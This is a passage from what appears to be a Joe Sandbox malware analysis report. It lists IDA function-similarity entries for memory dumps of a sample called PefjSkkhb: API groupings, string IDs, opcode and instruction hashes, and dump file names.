                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                      • String ID:
                                                                      • API String ID: 1211466189-0
                                                                      • Opcode ID: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                      • Instruction ID: 13cb9d64ae48564f72f01585807eea21aefb40974c3916422ddde7bb7a4435c0
                                                                      • Opcode Fuzzy Hash: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                      • Instruction Fuzzy Hash: 71A11436B1C68382EBA8AF259554739B7A0FB44B58F545035DF0A83B90CF3DF89087A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                                      • String ID:
                                                                      • API String ID: 50796853-0
                                                                      • Opcode ID: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                      • Instruction ID: 61912a6a530b065c92f5c668211b317d120811e92a8b717ef02a84006eb52837
                                                                      • Opcode Fuzzy Hash: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                      • Instruction Fuzzy Hash: 26B18E76B58A5286EB10FF65D0903BCA760FF85BA8F804531DA4E87796CF38E105C7A4
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                      • Instruction ID: e2543c0d9624685a5ca15c7b0bb6b55a48191a06eaaacf336af4c58fc158d613
                                                                      • Opcode Fuzzy Hash: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                      • Instruction Fuzzy Hash: 9251B361E8C95289FB65BF289448339A6919F82B68F9C4131C91E827D5DF7CB484D2E0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      • Opcode ID: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                      • Instruction ID: cedbf348f78950ca1a8736cf486a6626845ef5ed843ae4e298fcbae6bdb0a3a2
                                                                      • Opcode Fuzzy Hash: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                      • Instruction Fuzzy Hash: DB41AE766186818BE724DF21B454B6BBBA0F788BE5F504135EF8A83B54DF3CE4848B40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                                      • Instruction ID: 3fa67a42c8dedec8fdb7004b4045a62f3ff9ad810f6edd1ee82b31c65db9f0b7
                                                                      • Opcode Fuzzy Hash: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                                      • Instruction Fuzzy Hash: 84C1D422A5C7828AEB61BF1594402BDEB91BF40BA4FD54135EA4E87395CF3EF440C7A1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                      • String ID:
                                                                      • API String ID: 2550207440-0
                                                                      • Opcode ID: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                                      • Instruction ID: a08b53ecceecfb9cd98ead642efa148d60c630618c27028ee5f563ff0dcaca02
                                                                      • Opcode Fuzzy Hash: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                                      • Instruction Fuzzy Hash: 91A16A22A58B1285FB14BF65C4943BCA760EB44BA8F9D4532DA0D87795DFBCF481C3A0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                      • Instruction ID: 1b307d893c21ebfd07ae2df2f46dfac3218f8e6c6588fe79da72c757cbd0018d
                                                                      • Opcode Fuzzy Hash: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                      • Instruction Fuzzy Hash: C2A1B376A0C6C087D774AF19A4006AEFB71FB86BA4F544129DA8953B69CB3CE442CF50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Enabled
                                                                      • String ID:
                                                                      • API String ID: 3694350264-0
                                                                      • Opcode ID: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                      • Instruction ID: 6f95f2607bf45647eb889668d0d4a86f0feced08ba6638947e38772b4ad99d69
                                                                      • Opcode Fuzzy Hash: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                      • Instruction Fuzzy Hash: 7A919021E8966A89FB74BE15D4543B9E391AF84BB4FD44032CA4D837A5CF3DF49183A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                      • Instruction ID: 087637300050247b7bdc7b524c13fe4ef2516ba8fdb971bcc39002e01acd10e7
                                                                      • Opcode Fuzzy Hash: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                      • Instruction Fuzzy Hash: BC51D322A4D2D152FB61AF31510967EAF90FB46BE4F8D8074DA8A47B46CF2AF450C360
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                      • Instruction ID: 57406929e7c790f69f5f8d5863244985b1d1cd093d06535f4cac25477ba860f3
                                                                      • Opcode Fuzzy Hash: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                      • Instruction Fuzzy Hash: 4C51D222A0C2D156F761BF71560067EAF61FB46BD4F888079DA8947F46CF1AF45483B0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                      • String ID:
                                                                      • API String ID: 3401586794-0
                                                                      • Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                      • Instruction ID: 414038a513b06cf93c4c930df1dc123f905af823e053fd736c46e6caf0a05755
                                                                      • Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                      • Instruction Fuzzy Hash: F351E332A0878286FB14FF21A904AAEA7A1FB48BD8F984131DE0D47B44DF3DE455C790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                      • String ID: DllGetClassObject
                                                                      • API String ID: 668425406-1075368562
                                                                      • Opcode ID: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                      • Instruction ID: b74beebe6a2019ed4c1c266c6c7cbca53366f2807dd062cee4fa266f192987a0
                                                                      • Opcode Fuzzy Hash: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                      • Instruction Fuzzy Hash: B4516AA2A4CB4686EB14BF16E540369A3A0FB84BA4F848134DB5D87B45EF7DF094C790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: LongMessageSendWindow
                                                                      • String ID:
                                                                      • API String ID: 3360111000-0
                                                                      • Opcode ID: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                      • Instruction ID: 76b5ecf9cbc0a1912115a7257ca38402441499bf1744af9c9968ccba34cd59c3
                                                                      • Opcode Fuzzy Hash: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                      • Instruction Fuzzy Hash: C6418F31A49A4585EB60AF59E490679B360FBC4FA4F944132CE5E83BA4CF3DF4858360
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 4170576061-0
                                                                      • Opcode ID: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                      • Instruction ID: b24042e126fbc2db1aa28f9a70687522703437ed080f0e207df995dd69a7f8b7
                                                                      • Opcode Fuzzy Hash: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                      • Instruction Fuzzy Hash: 93419372A4C68682E720BF25A4482ADB361FB84BB4F844631DE6E837D5CF3CE545C790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                      • String ID:
                                                                      • API String ID: 161812096-0
                                                                      • Opcode ID: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                      • Instruction ID: 88ce0aa5a2dcdc50c62f625b93d029fc32e2840db65ff8affb959aa3a7cd535c
                                                                      • Opcode Fuzzy Hash: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                      • Instruction Fuzzy Hash: 3D41A076B04B1589E750EF66E4806AD73B0FB84BA8F998031DE4D87764CF78E485C7A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                      • String ID:
                                                                      • API String ID: 395352322-0
                                                                      • Opcode ID: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                      • Instruction ID: 7d0c0ea2cc018308a091d5b98a3d06d8d6a12726d5c0e29e045cde72ea43b12e
                                                                      • Opcode Fuzzy Hash: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                      • Instruction Fuzzy Hash: 9941743261CB8585E721EF11E4547EEA360FB89B58FD40131EA4D86B94CF7DE149CB90
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: f21550a20849581d29996fe50c4ece6234e076094f6ba7ae14899650e1c4ede6
                                                                      • Instruction ID: b1054dc40c6df17201e2143263294131a8ef66b2f6e77213d0f7b44ae9b3bf7a
                                                                      • Opcode Fuzzy Hash: f21550a20849581d29996fe50c4ece6234e076094f6ba7ae14899650e1c4ede6
                                                                      • Instruction Fuzzy Hash: 50317222B48B4585EB24BF16E444169B7A0FB85FE4F888236DE5E83794CF3DF4848794
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AllocByteCharMultiStringWide
                                                                      • String ID:
                                                                      • API String ID: 3603722519-0
                                                                      • Opcode ID: f7267f201cd2eed9e994b4383ba58dad1097741ddf4df76fdcc74d5d9af1769b
                                                                      • Instruction ID: ccac7ce3bc8854961533ad6a4183e7de06beea09b67bf10a1e47778772fa1464
                                                                      • Opcode Fuzzy Hash: f7267f201cd2eed9e994b4383ba58dad1097741ddf4df76fdcc74d5d9af1769b
                                                                      • Instruction Fuzzy Hash: ED315261B48B8589EB20BF11E444169F3A0FB44FA4F889236DE5D83795CF3DF5948750
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Msctls_Progress32
                                                                      • API String ID: 1025951953-3636473452
                                                                      • Opcode ID: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                      • Instruction ID: 0d02f634cc2bb5beca20703b255e2214f95ca36cba968676181a3e84c721ca0a
                                                                      • Opcode Fuzzy Hash: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                      • Instruction Fuzzy Hash: 9B315A3660D691C7E3609F25F494B1AB761FB887A0F509239EB9943B58CF3CE485CB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
